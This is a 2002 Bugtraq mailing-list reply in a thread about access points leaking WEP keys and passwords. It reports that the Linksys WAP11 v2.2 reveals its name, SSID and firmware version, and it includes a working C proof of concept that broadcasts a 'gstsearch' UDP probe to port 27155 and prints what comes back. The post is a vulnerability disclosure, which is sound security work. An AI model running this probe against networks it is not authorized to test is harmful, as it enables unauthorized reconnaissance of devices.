Bugtraq mailing list archives
Re: Accesspoints disclose wep keys, password and mac filter (fwd)
From: Thomas Sarlandie <sarfata () altern org>
Date: Tue, 05 Nov 2002 15:24:07 +0100
Hi,Linksys WAP11-V2.2 seems to be vulnerable in a different way. It only returns AP's name, SSID and firmware version. Except for firmware version, those are not private informations.
Quickly patched proof of concept : #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <netinet/in.h> #include <sys/socket.h> typedef struct { char type[28]; char blank1[8]; char apname[32]; char firmware[6]; char blank2[11]; char ssid[32]; } __attribute__ ((packed)) answer; int main() { char rcvbuffer[1024]; struct sockaddr_in sin; answer* ans = (answer *)rcvbuffer; int sd, ret, val; sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr("255.255.255.255"); sin.sin_port = htons(27155); sd = socket(AF_INET, SOCK_DGRAM, 0); if (sd < 0) perror("socket"); val = 1; ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val)); if (ret < 0) { perror("setsockopt"); exit(1); } ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct sockaddr)); if (ret < 0) { perror("sendto"); exit(1); } ret = read(sd,&rcvbuffer,sizeof(rcvbuffer)); if (ret > 0) { printf("Type : %s\n", ans->type); printf("Announced Name : %s\n", ans->apname); printf("Firmware version : %s\n", ans->firmware); printf("SSID : %s\n", ans->ssid); } else perror("read"); return 0; } thomas
KHAMSIN Security News KSN Reference: 2002-11-01 0001 ULO --------------------------------------------------------------------------- Title ----- Accesspoints disclose wep keys, password and mac filter Date ---- 2002-11-01
Current thread:
- Accesspoints disclose wep keys, password and mac filter (fwd) Tom Knienieder (Nov 04)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Frank Louwers (Nov 04)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Cliff Albert (Nov 04)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Hakan Carlsson (Nov 07)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Thomas Sarlandie (Nov 08)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Tollef Fog Heen (Nov 09)
- <Possible follow-ups>
- RE: Accesspoints disclose wep keys, password and mac filter (fwd) Melson, Paul (Nov 04)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Casper Dik (Nov 08)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) d k (Nov 05)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) informatik.koerfer (Nov 07)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) informatik.koerfer (Nov 07)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Alex Harasic (Nov 08)